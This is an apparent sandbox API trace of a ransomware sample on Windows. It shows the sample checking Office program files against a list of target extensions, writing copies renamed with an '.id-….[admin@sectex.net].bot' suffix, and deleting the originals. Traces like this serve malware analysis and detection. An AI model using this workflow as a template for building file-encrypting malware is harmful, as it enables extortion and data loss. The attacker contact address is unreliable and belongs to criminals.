	[0156.701] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\BORDERS\\MSART2.BDR") returned 61
	[0156.701] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\BORDERS\\MSART2.BDR") returned 61
	[0156.701] lstrlenW (lpString=".doc") returned 4
	[0156.701] lstrcmpiW (lpString1=".doc", lpString2=".BDR") returned 1
	[0156.701] lstrlenW (lpString=".docx") returned 5
	[0156.701] lstrcmpiW (lpString1=".docx", lpString2="2.BDR") returned -1
	[0156.701] lstrlenW (lpString=".pdf") returned 4
	[0156.701] lstrcmpiW (lpString1=".pdf", lpString2=".BDR") returned 1
	[0156.701] lstrlenW (lpString=".xls") returned 4
	[0156.701] lstrcmpiW (lpString1=".xls", lpString2=".BDR") returned 1
	[0156.701] lstrlenW (lpString=".xlsx") returned 5
	[0156.701] lstrcmpiW (lpString1=".xlsx", lpString2="2.BDR") returned -1
	[0156.701] lstrlenW (lpString=".ppt") returned 4
	[0156.701] lstrcmpiW (lpString1=".ppt", lpString2=".BDR") returned 1
	[0156.701] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\BORDERS\\MSART2.BDR") returned 61
	[0156.701] lstrlenW (lpString=".zip") returned 4
	[0156.701] lstrcmpiW (lpString1=".zip", lpString2=".BDR") returned 1
	[0156.701] lstrlenW (lpString=".rar") returned 4
	[0156.701] lstrcmpiW (lpString1=".rar", lpString2=".BDR") returned 1
	[0156.701] lstrlenW (lpString=".bz2") returned 4
	[0156.701] lstrcmpiW (lpString1=".bz2", lpString2=".BDR") returned 1
	[0156.701] lstrlenW (lpString=".7z") returned 3
	[0156.701] lstrcmpiW (lpString1=".7z", lpString2="BDR") returned -1
	[0156.702] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\BORDERS\\MSART2.BDR") returned 61
	[0156.702] lstrlenW (lpString=".dbf") returned 4
	[0156.702] lstrcmpiW (lpString1=".dbf", lpString2=".BDR") returned 1
	[0156.702] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\BORDERS\\MSART2.BDR") returned 61
	[0156.702] lstrlenW (lpString=".1cd") returned 4
	[0156.702] lstrcmpiW (lpString1=".1cd", lpString2=".BDR") returned -1
	[0156.702] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\BORDERS\\MSART2.BDR") returned 61
	[0156.702] lstrlenW (lpString=".jpg") returned 4
	[0156.702] lstrcmpiW (lpString1=".jpg", lpString2=".BDR") returned 1
	[0156.702] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\BORDERS\\MSART2.BDR") returned 61
	[0156.702] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\BORDERS\\MSART2.BDR") returned 61
	[0156.702] lstrlenW (lpString=".doc") returned 4
	[0156.702] lstrcmpiW (lpString1=".doc", lpString2=".BDR") returned 1
	[0156.702] lstrlenW (lpString=".docx") returned 5
	[0156.702] lstrcmpiW (lpString1=".docx", lpString2="2.BDR") returned -1
	[0156.702] lstrlenW (lpString=".pdf") returned 4
	[0156.702] lstrcmpiW (lpString1=".pdf", lpString2=".BDR") returned 1
	[0156.702] lstrlenW (lpString=".xls") returned 4
	[0156.702] lstrcmpiW (lpString1=".xls", lpString2=".BDR") returned 1
	[0156.702] lstrlenW (lpString=".xlsx") returned 5
	[0156.702] lstrcmpiW (lpString1=".xlsx", lpString2="2.BDR") returned -1
	[0156.702] lstrlenW (lpString=".ppt") returned 4
	[0156.702] lstrcmpiW (lpString1=".ppt", lpString2=".BDR") returned 1
	[0156.702] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\BORDERS\\MSART2.BDR") returned 61
	[0156.702] lstrlenW (lpString=".zip") returned 4
	[0156.702] lstrcmpiW (lpString1=".zip", lpString2=".BDR") returned 1
	[0156.702] lstrlenW (lpString=".rar") returned 4
	[0156.702] lstrcmpiW (lpString1=".rar", lpString2=".BDR") returned 1
	[0156.702] lstrlenW (lpString=".bz2") returned 4
	[0156.702] lstrcmpiW (lpString1=".bz2", lpString2=".BDR") returned 1
	[0156.702] lstrlenW (lpString=".7z") returned 3
	[0156.703] lstrcmpiW (lpString1=".7z", lpString2="BDR") returned -1
	[0156.703] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\BORDERS\\MSART2.BDR") returned 61
	[0156.703] lstrlenW (lpString=".dbf") returned 4
	[0156.703] lstrcmpiW (lpString1=".dbf", lpString2=".BDR") returned 1
	[0156.703] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\BORDERS\\MSART2.BDR") returned 61
	[0156.703] lstrlenW (lpString=".1cd") returned 4
	[0156.703] lstrcmpiW (lpString1=".1cd", lpString2=".BDR") returned -1
	[0156.703] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\BORDERS\\MSART2.BDR") returned 61
	[0156.703] lstrlenW (lpString=".jpg") returned 4
	[0156.703] lstrcmpiW (lpString1=".jpg", lpString2=".BDR") returned 1
	[0156.703] lstrcmpiW (lpString1=".EXE", lpString2=".bot") returned 1
	[0156.703] lstrlenW (lpString="CNFNOT32.EXE") returned 12
	[0156.703] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\CNFNOT32.EXE" (normalized: "c:\\program files\\microsoft office\\office14\\cnfnot32.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x388
	[0156.856] GetFileSizeEx (in: hFile=0x388, lpFileSize=0xaacff1c | out: lpFileSize=0xaacff1c*=225632) returned 1
	[0156.856] CloseHandle (hObject=0x388) returned 1
	[0156.856] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\CNFNOT32.EXE" (normalized: "c:\\program files\\microsoft office\\office14\\cnfnot32.exe")) returned 0x20
	[0156.872] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\CNFNOT32.EXE.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\cnfnot32.exe.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0156.873] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\CNFNOT32.EXE" (normalized: "c:\\program files\\microsoft office\\office14\\cnfnot32.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff
	[0156.874] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CNFNOT32.EXE") returned 55
	[0156.874] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CNFNOT32.EXE") returned 55
	[0156.874] lstrlenW (lpString=".doc") returned 4
	[0156.874] lstrcmpiW (lpString1=".doc", lpString2=".EXE") returned -1
	[0156.874] lstrlenW (lpString=".docx") returned 5
	[0156.874] lstrcmpiW (lpString1=".docx", lpString2="2.EXE") returned -1
	[0156.874] lstrlenW (lpString=".pdf") returned 4
	[0156.874] lstrcmpiW (lpString1=".pdf", lpString2=".EXE") returned 1
	[0156.874] lstrlenW (lpString=".xls") returned 4
	[0156.874] lstrcmpiW (lpString1=".xls", lpString2=".EXE") returned 1
	[0156.874] lstrlenW (lpString=".xlsx") returned 5
	[0156.874] lstrcmpiW (lpString1=".xlsx", lpString2="2.EXE") returned -1
	[0156.874] lstrlenW (lpString=".ppt") returned 4
	[0156.874] lstrcmpiW (lpString1=".ppt", lpString2=".EXE") returned 1
	[0156.874] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CNFNOT32.EXE") returned 55
	[0156.874] lstrlenW (lpString=".zip") returned 4
	[0156.875] lstrcmpiW (lpString1=".zip", lpString2=".EXE") returned 1
	[0156.875] lstrlenW (lpString=".rar") returned 4
	[0156.875] lstrcmpiW (lpString1=".rar", lpString2=".EXE") returned 1
	[0156.875] lstrlenW (lpString=".bz2") returned 4
	[0156.875] lstrcmpiW (lpString1=".bz2", lpString2=".EXE") returned -1
	[0156.875] lstrlenW (lpString=".7z") returned 3
	[0156.875] lstrcmpiW (lpString1=".7z", lpString2="EXE") returned -1
	[0156.875] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CNFNOT32.EXE") returned 55
	[0156.875] lstrlenW (lpString=".dbf") returned 4
	[0156.875] lstrcmpiW (lpString1=".dbf", lpString2=".EXE") returned -1
	[0156.875] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CNFNOT32.EXE") returned 55
	[0156.875] lstrlenW (lpString=".1cd") returned 4
	[0156.875] lstrcmpiW (lpString1=".1cd", lpString2=".EXE") returned -1
	[0156.875] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CNFNOT32.EXE") returned 55
	[0156.875] lstrlenW (lpString=".jpg") returned 4
	[0156.875] lstrcmpiW (lpString1=".jpg", lpString2=".EXE") returned 1
	[0156.875] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CNFNOT32.EXE") returned 55
	[0156.875] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CNFNOT32.EXE") returned 55
	[0156.875] lstrlenW (lpString=".doc") returned 4
	[0156.875] lstrcmpiW (lpString1=".doc", lpString2=".EXE") returned -1
	[0156.875] lstrlenW (lpString=".docx") returned 5
	[0156.875] lstrcmpiW (lpString1=".docx", lpString2="2.EXE") returned -1
	[0156.875] lstrlenW (lpString=".pdf") returned 4
	[0156.875] lstrcmpiW (lpString1=".pdf", lpString2=".EXE") returned 1
	[0156.875] lstrlenW (lpString=".xls") returned 4
	[0156.875] lstrcmpiW (lpString1=".xls", lpString2=".EXE") returned 1
	[0156.875] lstrlenW (lpString=".xlsx") returned 5
	[0156.875] lstrcmpiW (lpString1=".xlsx", lpString2="2.EXE") returned -1
	[0156.875] lstrlenW (lpString=".ppt") returned 4
	[0156.875] lstrcmpiW (lpString1=".ppt", lpString2=".EXE") returned 1
	[0156.876] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CNFNOT32.EXE") returned 55
	[0156.876] lstrlenW (lpString=".zip") returned 4
	[0156.876] lstrcmpiW (lpString1=".zip", lpString2=".EXE") returned 1
	[0156.876] lstrlenW (lpString=".rar") returned 4
	[0156.876] lstrcmpiW (lpString1=".rar", lpString2=".EXE") returned 1
	[0156.876] lstrlenW (lpString=".bz2") returned 4
	[0156.876] lstrcmpiW (lpString1=".bz2", lpString2=".EXE") returned -1
	[0156.876] lstrlenW (lpString=".7z") returned 3
	[0156.876] lstrcmpiW (lpString1=".7z", lpString2="EXE") returned -1
	[0156.876] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CNFNOT32.EXE") returned 55
	[0156.876] lstrlenW (lpString=".dbf") returned 4
	[0156.876] lstrcmpiW (lpString1=".dbf", lpString2=".EXE") returned -1
	[0156.876] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CNFNOT32.EXE") returned 55
	[0156.876] lstrlenW (lpString=".1cd") returned 4
	[0156.876] lstrcmpiW (lpString1=".1cd", lpString2=".EXE") returned -1
	[0156.876] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CNFNOT32.EXE") returned 55
	[0156.876] lstrlenW (lpString=".jpg") returned 4
	[0156.876] lstrcmpiW (lpString1=".jpg", lpString2=".EXE") returned 1
	[0156.876] lstrcmpiW (lpString1=".SAM", lpString2=".bot") returned 1
	[0156.876] lstrlenW (lpString="ACT3R.SAM") returned 9
	[0156.876] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\1033\\ACT3R.SAM" (normalized: "c:\\program files\\microsoft office\\office14\\convert\\1033\\act3r.sam"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x388
	[0156.879] GetFileSizeEx (in: hFile=0x388, lpFileSize=0xaacff1c | out: lpFileSize=0xaacff1c*=13192) returned 1
	[0156.879] CloseHandle (hObject=0x388) returned 1
	[0156.879] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\1033\\ACT3R.SAM" (normalized: "c:\\program files\\microsoft office\\office14\\convert\\1033\\act3r.sam")) returned 0x20
	[0156.879] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\1033\\ACT3R.SAM.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\convert\\1033\\act3r.sam.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0156.879] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\1033\\ACT3R.SAM" (normalized: "c:\\program files\\microsoft office\\office14\\convert\\1033\\act3r.sam"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x388
	[0156.879] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xaacfec8 | out: lpNewFilePointer=0x0) returned 1
	[0156.879] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xaacfec8 | out: lpNewFilePointer=0x0) returned 1
	[0156.879] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\1033\\ACT3R.SAM.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\convert\\1033\\act3r.sam.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x25c
	[0158.374] GetLastError () returned 0x0
	[0158.374] ReadFile (in: hFile=0x388, lpBuffer=0xb3a0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xaacfed4, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesRead=0xaacfed4*=0x3388, lpOverlapped=0x0) returned 1
	[0158.384] WriteFile (in: hFile=0x25c, lpBuffer=0xb3a0020*, nNumberOfBytesToWrite=0x3390, lpNumberOfBytesWritten=0xaacfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesWritten=0xaacfc9c*=0x3390, lpOverlapped=0x0) returned 1
	[0158.385] ReadFile (in: hFile=0x388, lpBuffer=0xb3a0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xaacfed4, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesRead=0xaacfed4*=0x0, lpOverlapped=0x0) returned 1
	[0158.385] WriteFile (in: hFile=0x25c, lpBuffer=0xb3a0020*, nNumberOfBytesToWrite=0xe6, lpNumberOfBytesWritten=0xaacfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesWritten=0xaacfc9c*=0xe6, lpOverlapped=0x0) returned 1
	[0158.385] SetEndOfFile (hFile=0x25c) returned 1
	[0158.385] CloseHandle (hObject=0x25c) returned 1
	[0158.385] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xaacfec8 | out: lpNewFilePointer=0x0) returned 1
	[0158.385] SetEndOfFile (hFile=0x388) returned 1
	[0158.387] CloseHandle (hObject=0x388) returned 1
	[0158.387] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\1033\\ACT3R.SAM.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0158.388] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\1033\\ACT3R.SAM" (normalized: "c:\\program files\\microsoft office\\office14\\convert\\1033\\act3r.sam")) returned 1
	[0158.388] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\1033\\ACT3R.SAM") returned 65
	[0158.388] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\1033\\ACT3R.SAM") returned 65
	[0158.388] lstrlenW (lpString=".doc") returned 4
	[0158.388] lstrcmpiW (lpString1=".doc", lpString2=".SAM") returned -1
	[0158.388] lstrlenW (lpString=".docx") returned 5
	[0158.388] lstrcmpiW (lpString1=".docx", lpString2="R.SAM") returned -1
	[0158.388] lstrlenW (lpString=".pdf") returned 4
	[0158.388] lstrcmpiW (lpString1=".pdf", lpString2=".SAM") returned -1
	[0158.388] lstrlenW (lpString=".xls") returned 4
	[0158.388] lstrcmpiW (lpString1=".xls", lpString2=".SAM") returned 1
	[0158.389] lstrlenW (lpString=".xlsx") returned 5
	[0158.389] lstrcmpiW (lpString1=".xlsx", lpString2="R.SAM") returned -1
	[0158.389] lstrlenW (lpString=".ppt") returned 4
	[0158.389] lstrcmpiW (lpString1=".ppt", lpString2=".SAM") returned -1
	[0158.389] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\1033\\ACT3R.SAM") returned 65
	[0158.389] lstrlenW (lpString=".zip") returned 4
	[0158.389] lstrcmpiW (lpString1=".zip", lpString2=".SAM") returned 1
	[0158.389] lstrlenW (lpString=".rar") returned 4
	[0158.389] lstrcmpiW (lpString1=".rar", lpString2=".SAM") returned -1
	[0158.389] lstrlenW (lpString=".bz2") returned 4
	[0158.389] lstrcmpiW (lpString1=".bz2", lpString2=".SAM") returned -1
	[0158.389] lstrlenW (lpString=".7z") returned 3
	[0158.389] lstrcmpiW (lpString1=".7z", lpString2="SAM") returned -1
	[0158.389] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\1033\\ACT3R.SAM") returned 65
	[0158.389] lstrlenW (lpString=".dbf") returned 4
	[0158.389] lstrcmpiW (lpString1=".dbf", lpString2=".SAM") returned -1
	[0158.389] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\1033\\ACT3R.SAM") returned 65
	[0158.389] lstrlenW (lpString=".1cd") returned 4
	[0158.389] lstrcmpiW (lpString1=".1cd", lpString2=".SAM") returned -1
	[0158.389] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\1033\\ACT3R.SAM") returned 65
	[0158.389] lstrlenW (lpString=".jpg") returned 4
	[0158.389] lstrcmpiW (lpString1=".jpg", lpString2=".SAM") returned -1
	[0158.389] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\1033\\ACT3R.SAM") returned 65
	[0158.389] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\1033\\ACT3R.SAM") returned 65
	[0158.389] lstrlenW (lpString=".doc") returned 4
	[0158.389] lstrcmpiW (lpString1=".doc", lpString2=".SAM") returned -1
	[0158.389] lstrlenW (lpString=".docx") returned 5
	[0158.389] lstrcmpiW (lpString1=".docx", lpString2="R.SAM") returned -1
	[0158.389] lstrlenW (lpString=".pdf") returned 4
	[0158.389] lstrcmpiW (lpString1=".pdf", lpString2=".SAM") returned -1
	[0158.390] lstrlenW (lpString=".xls") returned 4
	[0158.390] lstrcmpiW (lpString1=".xls", lpString2=".SAM") returned 1
	[0158.390] lstrlenW (lpString=".xlsx") returned 5
	[0158.390] lstrcmpiW (lpString1=".xlsx", lpString2="R.SAM") returned -1
	[0158.390] lstrlenW (lpString=".ppt") returned 4
	[0158.390] lstrcmpiW (lpString1=".ppt", lpString2=".SAM") returned -1
	[0158.390] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\1033\\ACT3R.SAM") returned 65
	[0158.390] lstrlenW (lpString=".zip") returned 4
	[0158.390] lstrcmpiW (lpString1=".zip", lpString2=".SAM") returned 1
	[0158.390] lstrlenW (lpString=".rar") returned 4
	[0158.390] lstrcmpiW (lpString1=".rar", lpString2=".SAM") returned -1
	[0158.390] lstrlenW (lpString=".bz2") returned 4
	[0158.390] lstrcmpiW (lpString1=".bz2", lpString2=".SAM") returned -1
	[0158.390] lstrlenW (lpString=".7z") returned 3
	[0158.390] lstrcmpiW (lpString1=".7z", lpString2="SAM") returned -1
	[0158.390] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\1033\\ACT3R.SAM") returned 65
	[0158.390] lstrlenW (lpString=".dbf") returned 4
	[0158.390] lstrcmpiW (lpString1=".dbf", lpString2=".SAM") returned -1
	[0158.390] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\1033\\ACT3R.SAM") returned 65
	[0158.390] lstrlenW (lpString=".1cd") returned 4
	[0158.390] lstrcmpiW (lpString1=".1cd", lpString2=".SAM") returned -1
	[0158.390] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\1033\\ACT3R.SAM") returned 65
	[0158.390] lstrlenW (lpString=".jpg") returned 4
	[0158.390] lstrcmpiW (lpString1=".jpg", lpString2=".SAM") returned -1
	[0158.390] lstrcmpiW (lpString1=".SAM", lpString2=".bot") returned 1
	[0158.390] lstrlenW (lpString="OLR.SAM") returned 7
	[0158.390] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\1033\\OLR.SAM" (normalized: "c:\\program files\\microsoft office\\office14\\convert\\1033\\olr.sam"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x388
	[0158.391] GetFileSizeEx (in: hFile=0x388, lpFileSize=0xaacff1c | out: lpFileSize=0xaacff1c*=15760) returned 1
	[0158.391] CloseHandle (hObject=0x388) returned 1
	[0158.391] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\1033\\OLR.SAM" (normalized: "c:\\program files\\microsoft office\\office14\\convert\\1033\\olr.sam")) returned 0x20
	[0158.391] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\1033\\OLR.SAM.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\convert\\1033\\olr.sam.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0158.391] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\1033\\OLR.SAM" (normalized: "c:\\program files\\microsoft office\\office14\\convert\\1033\\olr.sam"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x388
	[0158.392] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xaacfec8 | out: lpNewFilePointer=0x0) returned 1
	[0158.392] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xaacfec8 | out: lpNewFilePointer=0x0) returned 1
	[0158.392] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\1033\\OLR.SAM.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\convert\\1033\\olr.sam.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x25c
	[0158.392] GetLastError () returned 0x0
	[0158.392] ReadFile (in: hFile=0x388, lpBuffer=0xb3a0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xaacfed4, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesRead=0xaacfed4*=0x3d90, lpOverlapped=0x0) returned 1
	[0158.514] WriteFile (in: hFile=0x25c, lpBuffer=0xb3a0020*, nNumberOfBytesToWrite=0x3da0, lpNumberOfBytesWritten=0xaacfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesWritten=0xaacfc9c*=0x3da0, lpOverlapped=0x0) returned 1
	[0158.515] ReadFile (in: hFile=0x388, lpBuffer=0xb3a0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xaacfed4, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesRead=0xaacfed4*=0x0, lpOverlapped=0x0) returned 1
	[0158.515] WriteFile (in: hFile=0x25c, lpBuffer=0xb3a0020*, nNumberOfBytesToWrite=0xe2, lpNumberOfBytesWritten=0xaacfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesWritten=0xaacfc9c*=0xe2, lpOverlapped=0x0) returned 1
	[0158.515] SetEndOfFile (hFile=0x25c) returned 1
	[0158.515] CloseHandle (hObject=0x25c) returned 1
	[0158.515] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xaacfec8 | out: lpNewFilePointer=0x0) returned 1
	[0158.515] SetEndOfFile (hFile=0x388) returned 1
	[0158.517] CloseHandle (hObject=0x388) returned 1
	[0158.517] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\1033\\OLR.SAM.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0158.518] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\1033\\OLR.SAM" (normalized: "c:\\program files\\microsoft office\\office14\\convert\\1033\\olr.sam")) returned 1
	[0158.518] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\1033\\OLR.SAM") returned 63
	[0158.518] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\1033\\OLR.SAM") returned 63
	[0158.518] lstrlenW (lpString=".doc") returned 4
	[0158.518] lstrcmpiW (lpString1=".doc", lpString2=".SAM") returned -1
	[0158.518] lstrlenW (lpString=".docx") returned 5
	[0158.518] lstrcmpiW (lpString1=".docx", lpString2="R.SAM") returned -1
	[0158.518] lstrlenW (lpString=".pdf") returned 4
	[0158.518] lstrcmpiW (lpString1=".pdf", lpString2=".SAM") returned -1
	[0158.519] lstrlenW (lpString=".xls") returned 4
	[0158.519] lstrcmpiW (lpString1=".xls", lpString2=".SAM") returned 1
	[0158.519] lstrlenW (lpString=".xlsx") returned 5
	[0158.519] lstrcmpiW (lpString1=".xlsx", lpString2="R.SAM") returned -1
	[0158.519] lstrlenW (lpString=".ppt") returned 4
	[0158.519] lstrcmpiW (lpString1=".ppt", lpString2=".SAM") returned -1
	[0158.519] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\1033\\OLR.SAM") returned 63
	[0158.519] lstrlenW (lpString=".zip") returned 4
	[0158.519] lstrcmpiW (lpString1=".zip", lpString2=".SAM") returned 1
	[0158.519] lstrlenW (lpString=".rar") returned 4
	[0158.519] lstrcmpiW (lpString1=".rar", lpString2=".SAM") returned -1
	[0158.519] lstrlenW (lpString=".bz2") returned 4
	[0158.519] lstrcmpiW (lpString1=".bz2", lpString2=".SAM") returned -1
	[0158.519] lstrlenW (lpString=".7z") returned 3
	[0158.519] lstrcmpiW (lpString1=".7z", lpString2="SAM") returned -1
	[0158.519] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\1033\\OLR.SAM") returned 63
	[0158.519] lstrlenW (lpString=".dbf") returned 4
	[0158.519] lstrcmpiW (lpString1=".dbf", lpString2=".SAM") returned -1
	[0158.519] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\1033\\OLR.SAM") returned 63
	[0158.519] lstrlenW (lpString=".1cd") returned 4
	[0158.519] lstrcmpiW (lpString1=".1cd", lpString2=".SAM") returned -1
	[0158.519] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\1033\\OLR.SAM") returned 63
	[0158.519] lstrlenW (lpString=".jpg") returned 4
	[0158.519] lstrcmpiW (lpString1=".jpg", lpString2=".SAM") returned -1
	[0158.520] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\1033\\OLR.SAM") returned 63
	[0158.520] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\1033\\OLR.SAM") returned 63
	[0158.520] lstrlenW (lpString=".doc") returned 4
	[0158.520] lstrcmpiW (lpString1=".doc", lpString2=".SAM") returned -1
	[0158.520] lstrlenW (lpString=".docx") returned 5
	[0158.520] lstrcmpiW (lpString1=".docx", lpString2="R.SAM") returned -1
	[0158.520] lstrlenW (lpString=".pdf") returned 4
	[0158.520] lstrcmpiW (lpString1=".pdf", lpString2=".SAM") returned -1
	[0158.520] lstrlenW (lpString=".xls") returned 4
	[0158.520] lstrcmpiW (lpString1=".xls", lpString2=".SAM") returned 1
	[0158.520] lstrlenW (lpString=".xlsx") returned 5
	[0158.520] lstrcmpiW (lpString1=".xlsx", lpString2="R.SAM") returned -1
	[0158.520] lstrlenW (lpString=".ppt") returned 4
	[0158.520] lstrcmpiW (lpString1=".ppt", lpString2=".SAM") returned -1
	[0158.520] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\1033\\OLR.SAM") returned 63
	[0158.520] lstrlenW (lpString=".zip") returned 4
